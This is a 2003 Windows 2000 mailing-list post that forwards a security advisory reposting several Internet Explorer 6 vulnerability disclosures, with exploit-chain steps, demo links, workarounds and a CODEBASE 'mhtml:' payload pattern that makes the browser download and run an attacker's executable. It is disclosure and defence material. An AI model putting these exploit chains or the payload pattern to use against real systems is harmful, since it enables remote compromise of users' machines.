[windows2000] Re: FYI: Multiple vulnerabilities in Internet Explorer
- From: Bill Beckett <Bill.Beckett@xxxxxxxxxx>
- To: "'windows2000@xxxxxxxxxxxxx'" <windows2000@xxxxxxxxxxxxx>
- Date: Wed, 26 Nov 2003 10:37:53 -0500
Awesome, job security
> -----Original Message-----
> From: Daniel Ensor [SMTP:densor@xxxxxxxxx]
> Sent: Wednesday, November 26, 2003 8:35 AM
> To: 'windows2000@xxxxxxxxxxxxx'
> Subject: [windows2000] FYI: Multiple vulnerabilities in Internet
> Explorer
>
> Hi List
>
> Just got this in:
>
> Cheers
>
> Dan
> --------------------------------------------------------------------
> Integralis S3 Advise .. Integralis S3 Advise .. Integralis S3 Advise
> --------------------------------------------------------------------
>
> Affected platforms: IE 6.0 with XP SP1 and MS03-048.
> Scope for attack: Remote via hostile web page / e-mail.
> Effect: Various up to and including remote
> code execution leading to compromise of
> the users machine.
> Resolution: Disable "Active Scripting" in the
> INTERNET zone.
>
> A whole slew of vulnerabilities in Internet Explorer have been released by
> prominent IE researcher Liu Die Yu. These affect IE 6 with all the latest
> patches applied. In other words they are no patches available for any of
> these problems. This presents a "vulnerability window" in which many
> desktops will remain vulnerable unless remedial action is taken
> immediately.
>
>
> Pete Philips
> pete@xxxxxxxxxxxxxxxxxxx
>
> -----------------------------------------------------------------
> Integralis S3 Advise service
>
> The following message is reposted complete from the original source. It
> has
> not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
>
> New "Clean" IE Remote Compromise
>
> [tested]
> OS:Win2k3,CN version
> IE: with MS03-048 installed.
>
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
>
> [overview]
> By combining several vulnerabilities in Internet Explorer, an attacker can
> execute his EXE file on victim's system. ("Clean" means: there is no old
> published vulnerability involved in this exploit)
>
> [demo]
> There is a harmless demo:
> http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Demo/index.h
> tm
> l
> (runs harmless demonstration executable)
>
> [technical details]
> First, use MhtRedirParsesLocalFile to parse a local file in an IFRAME,
> (Liu
> Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirParsesLocalFile)
> Then, use BackToFramedJpu to reach MYCOMPUTER zone.
> (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu)
> At last, in MYCOMPUTER security zone, use MhtRedirLaunchInetExe to
> download
> the payload EXE file and execute it. (Liu Die Yu's
> http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe)
>
> [Workaround]
> Disable Active Scripting in INTERNET zone.
>
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski and mkill.
>
> -----
> all mentioned resources can always be found at UMBRELLA.MX.TC
>
> [people]
> LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
> UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"
>
> [message]
> A wise man learns from other's mistakes; a fool learns from his own.
>
> [Employment]
> I would like to work professionally as a security researcher/bug finder.
>
> See my resume at my site. I am very eager to work, flexible, and extremely
> productive. I have a top notch resume, with credentials from leading bug
> finders. I am willing to work per contract, relocate, or telecommute.
>
> [Give a Hand]
> I haven't got a job as a security researcher yet and my family don't
> support
> my security work - so, I don't have a computer of my own. Please consider
> about donating at: http://clik.to/donatepc
>
>
> -----------------------------------------------------------------
> Integralis S3 Advise service
>
> The following message is reposted complete from the original source. It
> has
> not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
>
> MHTML Redirection Leads to Downloading EXE and Executing
>
> [tested]
> OS:Win2k3,CN version
> IE: with MS03-048 installed.
>
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
>
> [overview]
> A vulnerability in Internet Explorer is found: any attacker that can reach
> MYCOMPUTER security zone(a.k.a local zone) is able to download his EXE
> file
> and execute it.
>
> [demo]
> There is a harmless demo:
> http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe/MhtRedirLaun
> ch
> InetExe-Demo.zip
>
> [technical details]
> There is a feature in Internet Explorer when it tries to retrieve a file
> embedded in an MHT file, like:
> mhtml:[Mhtml_File_Url]![Original_Resource_Url]
> If [Original_Resource_Url] cannot be retrieved from [Mhtml_File_Url], IE
> will try to download [Original_Resource_Url] and return the downloaded
> content.
>
> It's like as HTTP redirection.
>
> And CODEBASE execution is a URL-based security check.
> (Liu Die Yu's http://continue.to/trie )
>
> So, in MYCOMPUTER security, point CODEBASE property of an OBJECT tag with
> unused CLSID to: mhtml:file:///C:\No_SUCH_MHT.MHT![Attaker_PayloadEXE_Url]
> and then, IE will download [Attaker_PayloadEXE_Url] and execute it.
>
> [Workaround]
> Disable Active Scripting in INTERNET zone.
>
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski and mkill.
>
> -----
> all mentioned resources can always be found at UMBRELLA.MX.TC
>
> [people]
> LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
> UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"
>
> [message]
> A wise man learns from other's mistakes; a fool learns from his own.
>
> [Employment]
> I would like to work professionally as a security researcher/bug finder.
>
> See my resume at my site. I am very eager to work, flexible, and extremely
> productive. I have a top notch resume, with credentials from leading bug
> finders. I am willing to work per contract, relocate, or telecommute.
>
> [Give a Hand]
> I haven't got a job as a security researcher yet and my family don't
> support
> my security work - so, I don't have a computer of my own. Please consider
> about donating at: http://clik.to/donatepc
>
>
> -----------------------------------------------------------------
> Integralis S3 Advise service
>
> The following message is reposted complete from the original source. It
> has
> not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
>
> BackToFramedJpu - a successor of BackToJpu attack
>
> [tested]
> OS:Win2k3,CN version
> IE: with MS03-048 installed.
>
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
>
> [overview]
> A cross-zone scripting vulnerability has been found in Internet Explorer.
> If
> a webpage contains some subframe(either FRAME tag or IFRAME tag), its
> security zone may be compromised.
>
> [demo]
> There is a harmless demo:
> http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu/BackToFramedJpu-My
> Pa
> ge.htm
>
> [technical details]
> After applying MS03-048 patch, no javascript-protocol URL won't be stored
> in
> URL history list any more, which means classical "javascript-protocol URL
> in
> history" attack doesn't work any more. (Liu Die Yu's
> http://www.safecenter.net/UMBRELLAWEBV4/BackMyParent2/index.html)
>
> However, if an attacker do the following things:
> Navigate a sub-frame in victim document to a javascript-protocol URL,
> (first, navigate sub-frame to attacker's page, and then navigate the
> sub-frame a javascript-protocol
> URL)
> and then navigate the top window away,
> At last,navigate back("history.back()").
>
> the javascript-protocol URL will be loaded by the top window(victim
> document) and script in the javascript-protocol URL will be executed in
> the
> security zone of victim document - a.k.a cross-site/zone/domain scripting
>
> [Workaround]
> Disable Active Scripting in INTERNET zone.
>
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski and mkill.
>
> -----
> all mentioned resources can always be found at UMBRELLA.MX.TC
>
> [people]
> LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
> UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"
>
> [message]
> A wise man learns from other's mistakes; a fool learns from his own.
>
> [Employment]
> I would like to work professionally as a security researcher/bug finder.
>
> See my resume at my site. I am very eager to work, flexible, and extremely
> productive. I have a top notch resume, with credentials from leading bug
> finders. I am willing to work per contract, relocate, or telecommute.
>
> [Give a Hand]
> I haven't got a job as a security researcher yet and my family don't
> support
> my security work - so, I don't have a computer of my own. Please consider
> about donating at: http://clik.to/donatepc
>
>
> -----------------------------------------------------------------
> Integralis S3 Advise service
>
> The following message is reposted complete from the original source. It
> has
> not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
>
> HijackClickV2 - a successor of HijackClick attack
>
> [tested]
> OS:Win2k3,CN version
> IE: with MS03-048 installed.
>
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
>
> [overview]
> After applying MS03-048, the original HijackClick exploit doesn't work any
> more. With method caching(a.k.a "SaveRef"), HijackClick works again.
>
> [demo]
> There is a harmless demo:
> http://www.safecenter.net/UMBRELLAWEBV4/HijackClickV2/HijackClickV2-MyPage
> .h
> tm
>
> [technical details]
> After applying MS03-048, the original HijackClick exploit doesn't work any
> more. (Liu Die Yu's
> http://www.safecenter.net/UMBRELLAWEBV4/HijackClick/HijackClick-MyPage.HTM
>
> Because window.moveBy is inaccessible. Method caching attack can make
> window.moveBy accessible again.
>
> [Workaround]
> Disable Active Scripting in INTERNET zone.
>
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski and mkill.
>
> -----
> all mentioned resources can always be found at UMBRELLA.MX.TC
>
> [people]
> LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
> UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"
>
> [message]
> A wise man learns from other's mistakes; a fool learns from his own.
>
> [Employment]
> I would like to work professionally as a security researcher/bug finder.
>
> See my resume at my site. I am very eager to work, flexible, and extremely
> productive. I have a top notch resume, with credentials from leading bug
> finders. I am willing to work per contract, relocate, or telecommute.
>
> [Give a Hand]
> I haven't got a job as a security researcher yet and my family don't
> support
> my security work - so, I don't have a computer of my own. Please consider
> about donating at: http://clik.to/donatepc
>
>
> -----------------------------------------------------------------
> Integralis S3 Advise service
>
> The following message is reposted complete from the original source. It
> has
> not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
>
> Invalid ContentType may disclose cache directory
>
> [tested]
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
>
> [overview]
> The problem lies in the download function of Internet Explorer. This can
> be
> exploited by malicious web pages to get cache directory including random
> names.
>
> [demo]
> There are two harmless demos:
> 1st, online demo, powered by ASP:
> http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo
> 2nd, demo in ZIP format, powered by NETCAT:
> http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo.z
> ip
>
> [technical details]
> When CONTENTTYPE in HTTP response is invalid and file extension is "HTM",
> the downloaded HTM file will be opened in cache directory, in INTERNET
> security zone.
>
> In the 1st demo, this is done by the following ASP code:
> ----------
> response.ContentType = "whocares"
> response.AddHeader "content-disposition", "inline; filename=test.htm"
> ----------
>
> In the 2nd demo, this is done with the help of NETCAT.
>
> [Workaround]
> Disable Active Scripting in INTERNET zone, so HTML page opened in the
> cache
> can't send information back to the attacker.
>
> Note for "Invalid ContentType may disclose cache directory"
>
> This vulnerability("Invalid ContentType may disclose cache directory")
> doesn't work on all systems. ("Invalid ContentType may disclose cache
> directory", at
> http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/)
> Please note that execdror6 and LocalZoneInCache also depends on this
> vulnerability.
> (execdror6: http://www.safecenter.net/UMBRELLAWEBV4/execdror6/
> LocalZoneInCache:
> http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/)
> I have spent extra-ordinary time on this issue and here is all i know
> about
> it:
>
> First, The code was verified to work on a WinXp system(Simplified Chinese
> version) with all patches. Then, I sent LocalZoneInCache to HTTP-EQUIV,
> Dror
> Shalev and the Pull for testing: It works on Dror Shalev's WinXp
> machine(up-to-date) but it doesn't work on the Pull's Win2k system.
> (because
> he set killbit for Adodb.Stream activeX object.) Soon after that,
> HTTP-EQUIV found it does not work on his WinXp system(2-3 weeks old, with
> the latest IE patch). Then, to figure out what happened, i formatted disk
> and installed Win2k3 and WinXp(both Simplified Chinese version) and then
> applied the latest IE patch. Both remote compromise cases(LocalZoneInCache
> and execdror6) don't work any more. At last, i reproduced both remote
> compromise cases on MSIEv6 running on Simplified Chinese WinXp with the
> following patches: SP1;Q828750;Q330994;Q824145(a.k.a MS03-048)
>
> If you are using IE, please help me test it and send the result directly
> to
> my emailbox. Thanx in advance.
>
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski and mkill.
>
> -----
> all mentioned resources can always be found at UMBRELLA.MX.TC
>
> [people]
> LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
> UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"
>
> [Employment]
> I would like to work professionally as a security researcher/bug finder.
>
> See my resume at my site. I am very eager to work, flexible, and extremely
> productive. I have a top notch resume, with credentials from leading bug
> finders. I am willing to work per contract, relocate, or telecommute.
>
> [Give a Hand]
> I haven't got a job as a security researcher yet and my family don't
> support
> my security work - so, I don't have a computer of my own. Please consider
> about donating at: http://clik.to/donatepc
>
>
> -----------------------------------------------------------------
> Integralis S3 Advise service
>
> The following message is reposted complete from the original source. It
> has
> not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
>
> Cache Disclosure Leads to MYCOMPUTER Zone and Remote Compromise
>
> [tested]
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
>
> [overview]
> By combining cache file disclosure and several other unpatched
> vulnerabilties, an malicious INTERNET page can reach MYCOMPUTER zone. The
> demo uses Adodb.Stream to launch a remote compromise attack.
>
> [demo]
> There are two harmless demos:
> Online demo, powered by ASP:
> http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/LocalZoneInCache-
> De
> mo/index.html
> (runs harmless demonstration executable)
>
> [technical details]
> First, place an HTML file in IE cache directory and get its location. (Liu
> Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/index.html)
> Second, this HTML file can be parsed as an HTML page and treated as in
> MYCOMPUTER security zone. (Mindwarper of mlsecurity.com's
> http://www.mlsecurity.com/ie/ie.htm)
> (Liu Die Yu's
> http://www.safecenter.net/UMBRELLAWEBV4/DblSlashForCache/DblSlashForCache-
> Co
> ntent.htm)
> At last, Overwrite NOTEPAD.EXE and make IE launch it by openning a
> view-source protocol URL: (HTTP-EQUIV of MALWARE 's
> http://www.securityfocus.com/archive/1/343521)
>
> [Workaround]
> Disable Active Scripting in INTERNET zone, so HTML page opened in the
> cache
> can't send information back to the attacker.
>
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski, vadim and mkill.
>
> -----
> all mentioned resources can always be found at UMBRELLA.MX.TC
>
> [people]
> LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
> UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"
>
> [Employment]
> I would like to work professionally as a security researcher/bug finder.
>
> See my resume at my site. I am very eager to work, flexible, and extremely
> productive. I have a top notch resume, with credentials from leading bug
> finders. I am willing to work per contract, relocate, or telecommute.
>
> [Give a Hand]
> I haven't got a job as a security researcher yet and my family don't
> support
> my security work - so, I don't have a computer of my own. Please consider
> about donating at: http://clik.to/donatepc
>
>
> -----------------------------------------------------------------
> Integralis S3 Advise service
>
> The following message is reposted complete from the original source. It
> has
> not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
>
> IE Remote Compromise by Getting Cache Location
>
> [tested]
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
>
> [overview]
> With the help of LocalZoneInCache(refer to "[technical details]" part), an
> attacker can compromise a user's system even though the user has: 1.
> Customized IE cache directory, 2. Applied MS03-048 patch, 3. Set killbit
> for
> ADODB.STREAM ActiveX.
>
> [demo]
> online demo, powered by ASP:
> http://www.safecenter.net/UMBRELLAWEBV4/execdror6/execdror6-Demo/index.htm
> l
> (runs harmless demonstration executable)
>
> [technical details]
> execdror6 is derived from execdror5.
> (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/execdror5/)
> execdror6 differs from execdror5 in that:
> 1st, execdror6 uses LocalZoneInCache to reach MYCOMPUTER security zone.
> (Liu
> Die Yu's
> http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/index.html)
> 2nd, execdror6 gets IE cache directory directly from location.href.
> (LocalZoneInCache makes attaker's HTML page opened in cache directory.)
>
> [Workaround]
> Disable Active Scripting in INTERNET zone, so HTML page opened in the
> cache
> can't send information back to the attacker.
>
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski, vadim and mkill.
>
> -----
> all mentioned resources can always be found at UMBRELLA.MX.TC
>
> [people]
> LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
> UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"
>
> [Employment]
> I would like to work professionally as a security researcher/bug finder.
>
> See my resume at my site. I am very eager to work, flexible, and extremely
> productive. I have a top notch resume, with credentials from leading bug
> finders. I am willing to work per contract, relocate, or telecommute.
>
> [Give a Hand]
> I haven't got a job as a security researcher yet and my family don't
> support
> my security work - so, I don't have a computer of my own. Please consider
> about donating at: http://clik.to/donatepc
>
>
>
> ------------------------------------------------------------------------
> The information you receive/contained herein is to keep you aware of
> developments in IT security that have general relevance to your IT systems
> environment. Our objective is to provide information to you as rapidly as
> possible to alert you to security threats, issues and potential solutions.
> In view of the expediency of the information the solutions described will
> not necessarily have been fully tested as to their applicability to your
> particular environment. Hence you use this information at your sole risk
> and
> liability. All trademarks are acknowledged as belonging to their
> respective
> owners.
>
> Visit the new FDL web - site designed to serve you better -
> http://www.fdl.co.uk
>
>
> This message has been sent from Fuerst Day Lawson Ltd and confirms that
> the
> email has been scanned and to the best of our knowledge is free from virus
> infection. The unauthorised use, disclosure, forwarding or copying of this
> message and any attachments is strictly prohibited. If you have received
> this message in error, please email moderator@xxxxxxxxx This message and
> any
> attachments, which are confidential and may be privileged, are for the use
> of the addressee(s) only. The views and opinions expressed in this email
> message are the author's own and may not reflect the views and opinions of
> Fuerst Day Lawson Ltd.
> ********************************************************
> This Weeks Sponsor SeamlessPlanet.com
> Register your domain name for as low as $7.75 per year!
> Cheaper than Godaddy..same great service!
> http://SeamlessPlanet.com
> ********************************************************
> To Unsubscribe, set digest or vacation
> mode or view archives use the below link.
>
> http://thethin.net/win2000list.cfm
********************************************************
This Weeks Sponsor SeamlessPlanet.com
Register your domain name for as low as $7.75 per year!
Cheaper than Godaddy..same great service!
http://SeamlessPlanet.com
********************************************************
To Unsubscribe, set digest or vacation
mode or view archives use the below link.
http://thethin.net/win2000list.cfm
Other related posts:
